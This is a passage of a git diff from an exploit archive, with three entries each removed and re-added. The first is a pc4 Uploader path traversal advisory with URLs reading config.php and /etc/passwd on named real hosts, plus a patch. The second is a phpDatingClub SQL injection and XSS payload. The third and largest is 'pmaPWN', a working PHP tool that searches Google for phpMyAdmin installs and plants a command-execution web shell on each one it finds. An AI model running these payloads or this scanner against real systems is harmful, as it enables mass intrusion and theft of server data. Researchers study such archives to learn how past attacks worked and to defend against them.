-=INFO:		http://pc4arb.com/article-48.html
-=BUY:  		~~~
-=Download:      ~~~
-=DORK:		intext:"Pictures of Whale Penis"
-
-                                  ____________
-                              _-=/:Conditions:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-none
-
----------------------------------------===--------------------------------------
-
-                                _________________
-                            _-=/:Vulnerable_Code:\=-_
-````````````````````````````````````````````````````````````````````````````````
-// in "./pc4uploader/upfiles/index.php"
-
-function displayimage( $fn, $lastMod, $fs )
-{
-    global $out_Types;
-    $ext = explode( ".", $fn );
-    $ext_i = count( $ext ) - 1;
-    $file_ext = $ext[$ext_i];
-    header( "Last-Modified: ".$lastMod );
-    header( "ETag: ".getetag( $fn ) );
-    header( "Accept-Ranges: bytes" );
-    header( "Content-Length: ".$fs );
-    header( "Content-Type: ".$out_Types[$file_ext] );
-    $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
-    if ( function_exists( fpassthru ) )
-    {
-        fpassthru( $fp );
-    }
-    else
-    {
-        $temp = fread( $fp, $fs );
-        echo $temp;
-    }
-    fclose( $fp );
-    return;
-}
-
-// Function displayimage() is later called
-
-$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
-//..
-//..
-//..
-//..
-    displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
-
----------------------------------------===--------------------------------------
-
-                                     _______
-                                 _-=/:P.o.C:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-http://localhost/pc4uploader/upfiles/index.php?file=../config.php
-http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
-
-demo:
-
-http://upload.traidnt.net/upfiles/index.php?file=../config.php
-{Save File to view the code if needed}
-
-http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
-{view source}
-
-
-
----------------------------------------===--------------------------------------
-
-                                    __________
-                                _-=/:SOLUTION:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-//Use this displayimage() function instead, notice the changes..
-
-function displayimage( $fn, $lastMod, $fs )
-{
-    global $out_Types;
-    $fn = basename($fn); 
-    $ext = explode( ".", $fn );
-    $ext_i = count( $ext ) - 1;
-    $file_ext = $ext[$ext_i];
-    header( "Last-Modified: ".$lastMod );
-    header( "ETag: ".getetag( $fn ) );
-    header( "Accept-Ranges: bytes" );
-    header( "Content-Length: ".$fs );
-    header( "Content-Type: ".$out_Types[$file_ext] );
-    $fp = fopen( $fn, "rb" );
-    if ( function_exists( fpassthru ) )
-    {
-        fpassthru( $fp );
-    }
-    else
-    {
-        $temp = fread( $fp, $fs );
-        echo $temp;
-    }
-    fclose( $fp );
-    return;
-}
-
-//I added    $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
-// since config.php doesent exist the script will do the rest by giving a safe error,
-// also move ./include/default.gif to ./upfiles/default.gif
-// everything should be good :)
-
----------------------------------------===--------------------------------------
- ______________________________________________________________________________
-/                                                                              \
-|         Tem al-tableegh 3an el-thaghra min sinat yaddi 	               |
-\______________________________________________________________________________/
-                                \ No More Private /
-                                 `````````````````
-                           Salamz to All Muslim Hackers.
-
-# milw0rm.com [2009-06-22]
+                                            ||          ||   | ||
+                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
+                                    (  :  /    (_)    /           (      .
+
+                                             ___________________
+                                           _/QQQQQQQQQQQQQQQQQQQ\__
+                                        __/QQQ/````````````````\QQQ\___
+                                      _/QQQQQ/                  \QQQQQQ\
+                                     /QQQQ/``                    ```QQQQ\
+                                    /QQQQ/ Advisory                 \QQQQ\
+                                   |QQQQ/    By      Qabandi         \QQQQ|
+                                   |QQQQ|                            |QQQQ|
+                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
+                                   |QQQQ|                            |QQQQ|
+                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
+                                    \QQQQ\                      __  /QQQQ/
+                                     \QQQQ\                    /QQ\_QQQQ/
+                                      \QQQQ\                   \QQQQQQQ/
+                                       \QQQQQ\                 /QQQQQ/_
+                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
+                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
+                                              ```````````````````     `````
+
+=Vuln:		pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
+=INFO:		http://pc4arb.com/article-48.html
+=BUY:  		~~~
+=Download:      ~~~
+=DORK:		intext:"Pictures of Whale Penis"
+
+                                  ____________
+                              _-=/:Conditions:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+none
+
+---------------------------------------===--------------------------------------
+
+                                _________________
+                            _-=/:Vulnerable_Code:\=-_
+````````````````````````````````````````````````````````````````````````````````
+// in "./pc4uploader/upfiles/index.php"
+
+function displayimage( $fn, $lastMod, $fs )
+{
+    global $out_Types;
+    $ext = explode( ".", $fn );
+    $ext_i = count( $ext ) - 1;
+    $file_ext = $ext[$ext_i];
+    header( "Last-Modified: ".$lastMod );
+    header( "ETag: ".getetag( $fn ) );
+    header( "Accept-Ranges: bytes" );
+    header( "Content-Length: ".$fs );
+    header( "Content-Type: ".$out_Types[$file_ext] );
+    $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
+    if ( function_exists( fpassthru ) )
+    {
+        fpassthru( $fp );
+    }
+    else
+    {
+        $temp = fread( $fp, $fs );
+        echo $temp;
+    }
+    fclose( $fp );
+    return;
+}
+
+// Function displayimage() is later called
+
+$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
+//..
+//..
+//..
+//..
+    displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
+
+---------------------------------------===--------------------------------------
+
+                                     _______
+                                 _-=/:P.o.C:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+http://localhost/pc4uploader/upfiles/index.php?file=../config.php
+http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
+
+demo:
+
+http://upload.traidnt.net/upfiles/index.php?file=../config.php
+{Save File to view the code if needed}
+
+http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
+{view source}
+
+
+
+---------------------------------------===--------------------------------------
+
+                                    __________
+                                _-=/:SOLUTION:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+//Use this displayimage() function instead, notice the changes..
+
+function displayimage( $fn, $lastMod, $fs )
+{
+    global $out_Types;
+    $fn = basename($fn); 
+    $ext = explode( ".", $fn );
+    $ext_i = count( $ext ) - 1;
+    $file_ext = $ext[$ext_i];
+    header( "Last-Modified: ".$lastMod );
+    header( "ETag: ".getetag( $fn ) );
+    header( "Accept-Ranges: bytes" );
+    header( "Content-Length: ".$fs );
+    header( "Content-Type: ".$out_Types[$file_ext] );
+    $fp = fopen( $fn, "rb" );
+    if ( function_exists( fpassthru ) )
+    {
+        fpassthru( $fp );
+    }
+    else
+    {
+        $temp = fread( $fp, $fs );
+        echo $temp;
+    }
+    fclose( $fp );
+    return;
+}
+
+//I added    $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
+// since config.php doesent exist the script will do the rest by giving a safe error,
+// also move ./include/default.gif to ./upfiles/default.gif
+// everything should be good :)
+
+---------------------------------------===--------------------------------------
+ ______________________________________________________________________________
+/                                                                              \
+|         Tem al-tableegh 3an el-thaghra min sinat yaddi 	               |
+\______________________________________________________________________________/
+                                \ No More Private /
+                                 `````````````````
+                           Salamz to All Muslim Hackers.
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8990.txt b/platforms/php/webapps/8990.txt
index 12697a8ea..ae61e4f98 100755
--- a/platforms/php/webapps/8990.txt
+++ b/platforms/php/webapps/8990.txt
@@ -1,24 +1,24 @@
-###################################################################
-###################################################################
-phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
-Note: Algeria 2-0 Zambia
-###################################################################
-Founder : ThE g0bL!N
-Home:WwW.Snakespc.CoM
-More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
-###################################################################
-###################################################################
-SQL Injection Vulnerability  
-###################################################################
-Exploit
-###################################################################
-Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
-Xss
-website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
-Demo
-----
-http://www.w2b.ru/demo/phpDatingClub/
-######################################################################
-Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers
-
-# milw0rm.com [2009-06-22]
+###################################################################
+###################################################################
+phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
+Note: Algeria 2-0 Zambia
+###################################################################
+Founder : ThE g0bL!N
+Home:WwW.Snakespc.CoM
+More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
+###################################################################
+###################################################################
+SQL Injection Vulnerability  
+###################################################################
+Exploit
+###################################################################
+Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
+Xss
+website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
+Demo
+----
+http://www.w2b.ru/demo/phpDatingClub/
+######################################################################
+Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8992.php b/platforms/php/webapps/8992.php
index a2b4a2fef..7f7511439 100755
--- a/platforms/php/webapps/8992.php
+++ b/platforms/php/webapps/8992.php
@@ -1,305 +1,305 @@
- 1) {
-	print "|****************************************************************|\n";
-	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
-	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
-	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
-	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
-	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
-	print "|****************************************************************|\n";
-	print "\n";
-	print "Usage: php $argv[0] \n";
-	exit;
-}
-
-	print "|****************************************************************|\n";
-	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
-	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
-	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
-	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
-	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
-	print "|****************************************************************|\n";
-	print "\n";
-	$Handlex = FOpen("pmaPWN.log", "a+");
-	FWrite($Handlex, "|****************************************************************|\n");
-	FWrite($Handlex, "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
-	FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
-	FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
-	FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
-	FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
-	FWrite($Handlex, "|****************************************************************|\n\n");
-    print "[-] Master, where you want to go today? \n";
-	print "[-] example dork: intitle:phpMyAdmin \n";
-    fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
-    $dork = trim(fgets(STDIN));
-    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
-	FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
-    for($i = 0; $i <= 900; $i+=100) {
-    $ch = curl_init();
-    curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
-	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
-    curl_setopt($ch, CURLOPT_HEADER, 1);
-    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
-    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
-    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
-    $pg = curl_exec($ch);
-	curl_close($ch);
-
-    if (preg_match_all("/
    /", $pg, $links)) { $res[] = $links[2]; }
-	}
-	
-    foreach($res as $key) {
-        foreach($key as $target) {
-            $total++;
-        }
-    }
-    print "[+] Done. $total rows return.\n";
-	FWrite($Handlex, "[+] Done. $total rows return.\n");
-	FClose($Handlex);
-    foreach($res as $key) {
-        foreach($key as $target) {
-			$Handlex = FOpen("pmaPWN.log", "a+");
-			$real = parse_url($target);
-			$url = "http://".$real['host'];
-			print "\n[-] Scanning phpMyAdmin on ".$url."\n";
-			FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
-			FClose($Handlex);
-			sleep(5);
-			$curlHandle = curl_multi_init();
-			for ($i = 0;$i < count($list); $i++)
-			$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
-			ExecHandle($curlHandle);
-			for ($i = 0;$i < count($list); $i++)
-			{			
-				$text[$i] =  curl_multi_getcontent ($curl[$i]);
-				//echo $url.$list[$i]."\n";
-				$Handlex = FOpen("pmaPWN.log", "a+");
-				if (preg_match("/phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
-				print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
-				print "\n[+] Testing vulnerable, wait sec..\n";
-				FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
-				FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
-					if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
-						print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
-						FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
-					}
-				FClose($Handlex);
-				exploit_site($url.$list[$i]);
-				}
-			}
-			for ($i = 0;$i < count($list); $i++)//remove the handles
-			curl_multi_remove_handle($curlHandle,$curl[$i]);
-			curl_multi_close($curlHandle);
-			sleep(5);
-		}
-    }
-
-function addHandle(&$curlHandle,$url)
-{
-$cURL = curl_init();
-curl_setopt($cURL, CURLOPT_URL, $url);
-curl_setopt($cURL, CURLOPT_HEADER, 0);
-curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
-curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
-curl_multi_add_handle($curlHandle,$cURL);
-return $cURL;
-}
-//execute the handle until the flag passed
-// to function is greater then 0
-function ExecHandle(&$curlHandle)
-{
-$flag=null;
-do {
-//fetch pages in parallel
-curl_multi_exec($curlHandle,$flag);
-} while ($flag > 0);
-}
-
-function exploit_site($url) {
-	$ch = curl_init();
-	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
-	curl_setopt($ch, CURLOPT_HEADER, 1);
-	curl_setopt($ch, CURLOPT_TIMEOUT, 200);
-	curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
-	$result = curl_exec($ch);
-	curl_close($ch);
-	$ch2 = curl_init();
-	curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
-	curl_setopt($ch2, CURLOPT_HEADER, 1);
-	curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
-	curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
-	$result2 = curl_exec($ch2);
-	curl_close($ch2);
-	//print $url;
-	if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
-		print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
-		print "\n[+] Exploiting, wait sec..\n";
-		$Handlex = FOpen("pmaPWN.log", "a+");
-		FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
-		FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
-		FClose($Handlex);
-		exploit($url);
-	}
-	else {
-		$Handlex = FOpen("pmaPWN.log", "a+");
-		print "\n[-] Shit! no luck.. not vulnerable\n";
-		FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
-		FClose($Handlex);
-	}
-}
-
-	function exploit($w00t) {
-		$Handlex = FOpen("pmaPWN.log", "a+");
-		$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox 
-		//first get cookie + token 
-		$curl = curl_init(); 
-		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL 
-		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
-		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
-		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
-		curl_setopt($curl, CURLOPT_TIMEOUT, 200); 
-		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 
-		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); 		
-		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string 
-		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
-		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
-		$result = curl_exec($curl);
-		curl_close($curl);
-		if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
-		
-		$token = $matches[1][1];
-		if ($token != '') {
-		print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
-		FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
-		$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
-		print "\n[+] Sending evil payload mwahaha.. \n";
-		FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
-		$curl = curl_init(); 
-		curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); 
-		curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
-		curl_setopt($curl, CURLOPT_TIMEOUT, 200);
-		curl_setopt($curl, CURLOPT_USERAGENT, $useragent); 
-		curl_setopt($curl, CURLOPT_REFERER, $w00t); 
-		curl_setopt($curl, CURLOPT_POST, true); 
-		curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); 
-		curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt"); 
-		curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt"); 
-		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3); 
-		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
-		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
-		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
-		$result = curl_exec($curl);
-		curl_close($curl);
-		
-		print "\n[!] w00t! w00t! You should now have shell here";
-		print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
-		print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
-		FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
-		FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
-		
-		}
-		else {
-			print "\n[!] Shit! no luck.. not vulnerable\n";
-			FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
-			return false;
-		}
-		FClose($Handlex);
-		if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
-		//exit();
-	}
-
-?>
-
-# milw0rm.com [2009-06-22]
+<?php
+
+$list = array(
+'/phpmyadmin/',
+'/phpMyAdmin/', 
+'/PMA/',
+'/pma/', 
+'/admin/', 
+'/dbadmin/', 
+'/mysql/', 
+'/myadmin/', 
+'/phpmyadmin2/', 
+'/phpMyAdmin2/', 
+'/phpMyAdmin-2/', 
+'/php-my-admin/', 
+'/phpMyAdmin-2.2.3/', 
+'/phpMyAdmin-2.2.6/', 
+'/phpMyAdmin-2.5.1/', 
+'/phpMyAdmin-2.5.4/', 
+'/phpMyAdmin-2.5.5-rc1/', 
+'/phpMyAdmin-2.5.5-rc2/', 
+'/phpMyAdmin-2.5.5/', 
+'/phpMyAdmin-2.5.5-pl1/', 
+'/phpMyAdmin-2.5.6-rc1/', 
+'/phpMyAdmin-2.5.6-rc2/', 
+'/phpMyAdmin-2.5.6/', 
+'/phpMyAdmin-2.5.7/', 
+'/phpMyAdmin-2.5.7-pl1/', 
+'/phpMyAdmin-2.6.0-alpha/', 
+'/phpMyAdmin-2.6.0-alpha2/', 
+'/phpMyAdmin-2.6.0-beta1/', 
+'/phpMyAdmin-2.6.0-beta2/', 
+'/phpMyAdmin-2.6.0-rc1/', 
+'/phpMyAdmin-2.6.0-rc2/', 
+'/phpMyAdmin-2.6.0-rc3/', 
+'/phpMyAdmin-2.6.0/', 
+'/phpMyAdmin-2.6.0-pl1/', 
+'/phpMyAdmin-2.6.0-pl2/', 
+'/phpMyAdmin-2.6.0-pl3/', 
+'/phpMyAdmin-2.6.1-rc1/', 
+'/phpMyAdmin-2.6.1-rc2/', 
+'/phpMyAdmin-2.6.1/', 
+'/phpMyAdmin-2.6.1-pl1/', 
+'/phpMyAdmin-2.6.1-pl2/', 
+'/phpMyAdmin-2.6.1-pl3/', 
+'/phpMyAdmin-2.6.2-rc1/', 
+'/phpMyAdmin-2.6.2-beta1/', 
+'/phpMyAdmin-2.6.2-rc1/', 
+'/phpMyAdmin-2.6.2/', 
+'/phpMyAdmin-2.6.2-pl1/', 
+'/phpMyAdmin-2.6.3/', 
+'/phpMyAdmin-2.6.3-rc1/', 
+'/phpMyAdmin-2.6.3/', 
+'/phpMyAdmin-2.6.3-pl1/', 
+'/phpMyAdmin-2.6.4-rc1/', 
+'/phpMyAdmin-2.6.4-pl1/', 
+'/phpMyAdmin-2.6.4-pl2/', 
+'/phpMyAdmin-2.6.4-pl3/', 
+'/phpMyAdmin-2.6.4-pl4/', 
+'/phpMyAdmin-2.6.4/', 
+'/phpMyAdmin-2.7.0-beta1/', 
+'/phpMyAdmin-2.7.0-rc1/', 
+'/phpMyAdmin-2.7.0-pl1/', 
+'/phpMyAdmin-2.7.0-pl2/', 
+'/phpMyAdmin-2.7.0/', 
+'/phpMyAdmin-2.8.0-beta1/', 
+'/phpMyAdmin-2.8.0-rc1/', 
+'/phpMyAdmin-2.8.0-rc2/', 
+'/phpMyAdmin-2.8.0/', 
+'/phpMyAdmin-2.8.0.1/', 
+'/phpMyAdmin-2.8.0.2/', 
+'/phpMyAdmin-2.8.0.3/', 
+'/phpMyAdmin-2.8.0.4/', 
+'/phpMyAdmin-2.8.1-rc1/', 
+'/phpMyAdmin-2.8.1/', 
+'/phpMyAdmin-2.8.2/', 
+'/sqlmanager/', 
+'/mysqlmanager/', 
+'/p/m/a/', 
+'/PMA2005/', 
+'/pma2005/', 
+'/phpmanager/', 
+'/php-myadmin/', 
+'/phpmy-admin/', 
+'/webadmin/', 
+'/sqlweb/', 
+'/websql/', 
+'/webdb/', 
+'/mysqladmin/', 
+'/mysql-admin/',
+);
+
+if($argc > 1) {
+	print "|****************************************************************|\n";
+	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
+	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
+	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
+	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
+	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
+	print "|****************************************************************|\n";
+	print "\n";
+	print "Usage: php $argv[0] \n";
+	exit;
+}
+
+	print "|****************************************************************|\n";
+	print "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
+	print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
+	print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
+	print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
+	print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
+	print "|****************************************************************|\n";
+	print "\n";
+	$Handlex = FOpen("pmaPWN.log", "a+");
+	FWrite($Handlex, "|****************************************************************|\n");
+	FWrite($Handlex, "        pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
+	FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
+	FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
+	FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
+	FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
+	FWrite($Handlex, "|****************************************************************|\n\n");
+    print "[-] Master, where you want to go today? \n";
+	print "[-] example dork: intitle:phpMyAdmin \n";
+    fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
+    $dork = trim(fgets(STDIN));
+    print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
+	FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
+    for($i = 0; $i <= 900; $i+=100) {
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
+    curl_setopt($ch, CURLOPT_HEADER, 1);
+    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
+    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
+    $pg = curl_exec($ch);
+	curl_close($ch);
+
+    if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
+	}
+	
+    foreach($res as $key) {
+        foreach($key as $target) {
+            $total++;
+        }
+    }
+    print "[+] Done. $total rows return.\n";
+	FWrite($Handlex, "[+] Done. $total rows return.\n");
+	FClose($Handlex);
+    foreach($res as $key) {
+        foreach($key as $target) {
+			$Handlex = FOpen("pmaPWN.log", "a+");
+			$real = parse_url($target);
+			$url = "http://".$real['host'];
+			print "\n[-] Scanning phpMyAdmin on ".$url."\n";
+			FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
+			FClose($Handlex);
+			sleep(5);
+			$curlHandle = curl_multi_init();
+			for ($i = 0;$i < count($list); $i++)
+			$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
+			ExecHandle($curlHandle);
+			for ($i = 0;$i < count($list); $i++)
+			{			
+				$text[$i] =  curl_multi_getcontent ($curl[$i]);
+				//echo $url.$list[$i]."\n";
+				$Handlex = FOpen("pmaPWN.log", "a+");
+				if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
+				print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
+				print "\n[+] Testing vulnerable, wait sec..\n";
+				FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
+				FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
+					if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
+						print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
+						FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
+					}
+				FClose($Handlex);
+				exploit_site($url.$list[$i]);
+				}
+			}
+			for ($i = 0;$i < count($list); $i++)//remove the handles
+			curl_multi_remove_handle($curlHandle,$curl[$i]);
+			curl_multi_close($curlHandle);
+			sleep(5);
+		}
+    }
+
+function addHandle(&$curlHandle,$url)
+{
+$cURL = curl_init();
+curl_setopt($cURL, CURLOPT_URL, $url);
+curl_setopt($cURL, CURLOPT_HEADER, 0);
+curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
+curl_multi_add_handle($curlHandle,$cURL);
+return $cURL;
+}
+//execute the handle until the flag passed
+// to function is greater then 0
+function ExecHandle(&$curlHandle)
+{
+$flag=null;
+do {
+//fetch pages in parallel
+curl_multi_exec($curlHandle,$flag);
+} while ($flag > 0);
+}
+
+function exploit_site($url) {
+	$ch = curl_init();
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($ch, CURLOPT_HEADER, 1);
+	curl_setopt($ch, CURLOPT_TIMEOUT, 200);
+	curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
+	$result = curl_exec($ch);
+	curl_close($ch);
+	$ch2 = curl_init();
+	curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
